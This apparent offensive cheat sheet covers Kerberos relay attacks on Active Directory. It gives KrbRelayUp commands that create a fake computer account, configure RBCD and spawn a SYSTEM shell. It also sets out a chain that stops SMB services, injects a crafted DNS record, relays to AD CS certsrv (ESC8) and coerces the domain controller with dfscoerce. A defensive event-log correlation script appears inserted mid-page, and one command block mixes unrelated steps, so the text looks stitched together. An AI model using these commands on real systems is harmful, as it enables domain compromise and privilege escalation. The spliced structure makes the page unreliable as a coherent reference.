Kerberos Relay
mitm6 + Kerberos DNS Relay + AD CS ESC8
Tools
KrbRelay
KrbRelayUp
RELAY
Relay authentication to LDAP(S) with automatic machine creation and configure RBCD:
PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]
Perform RBCD with UPNs:
PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!
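On the detection side, the RELAY mode above leaves a pair of records in the domain controller Security log: a computer account creation (event 4741) followed shortly by a write to msDS-AllowedToActOnBehalfOfOtherIdentity (event 5136). The correlation below is an added example, not code from this page or from KrbRelayUp; the simplified record layout, the sample events and the 10-minute window are assumptions, and 5136 is only logged when directory service change auditing is enabled.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment

# Constructed, simplified Security-log records (not captured from a real DC).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:05", "id": 4741, "subject": "j.doe", "target": "FAKEMACHINE$"},
    {"time": "2024-05-01T10:00:09", "id": 5136, "subject": "WS01$",
     "object_dn": "CN=WS01,CN=Computers,DC=megacorp,DC=local", "attribute": RBCD_ATTR},
    {"time": "2024-05-01T12:30:00", "id": 5136, "subject": "helpdesk",
     "object_dn": "CN=WS02,CN=Computers,DC=megacorp,DC=local", "attribute": "description"},
    {"time": "2024-05-01T15:00:00", "id": 4741, "subject": "svc-join", "target": "WS77$"},
]

def find_rbcd_chains(events, window=WINDOW):
    """Alert on every RBCD attribute write; raise severity when a computer
    account was created within `window` before the write."""
    created = []  # (time, creator, new account) from 4741 events seen so far
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO 8601 sorts lexically
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4741:
            created.append((ts, ev["subject"], ev["target"]))
        elif ev["id"] == 5136 and ev.get("attribute", "").lower() == RBCD_ATTR.lower():
            recent = [(who, acct) for t, who, acct in created if ts - t <= window]
            cn = ev["object_dn"].split(",")[0].split("=", 1)[1]
            alerts.append({
                "time": ev["time"],
                "object_dn": ev["object_dn"],
                "writer": ev["subject"],
                # True when a computer account changed its own delegation setting
                "self_write": ev["subject"].rstrip("$").lower() == cn.lower(),
                "recent_machine_accounts": recent,
                "severity": "high" if recent else "medium",
            })
    return alerts

if __name__ == "__main__":
    for alert in find_rbcd_chains(SAMPLE_EVENTS):
        print(alert)
```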
SPAWN
Execute a command as NT AUTHORITY\SYSTEM via RBCD abuse:
PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|--ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]
As @ShitSecure mentioned, executing the binary as a .NET reflective assembly from PowerShell will fail: the PowerShell process has already initialized the COM security parameters for itself at launch, so the new parameters that KrbRelay(Up) attempts to set through CoInitializeSecurity are not applied.
RemoteKrbRelay
KrbRelay-SMBServer
Stop the SMB server services with Cmd (the second command re-enables and starts them again):
Cmd > sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
Cmd > sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet
Stop services with PowerShell (the last command starts them again):
PS > Invoke-DNSUpdate -DNSName adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 10.10.13.37
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ dfscoerce.py -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.megacorp.local
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet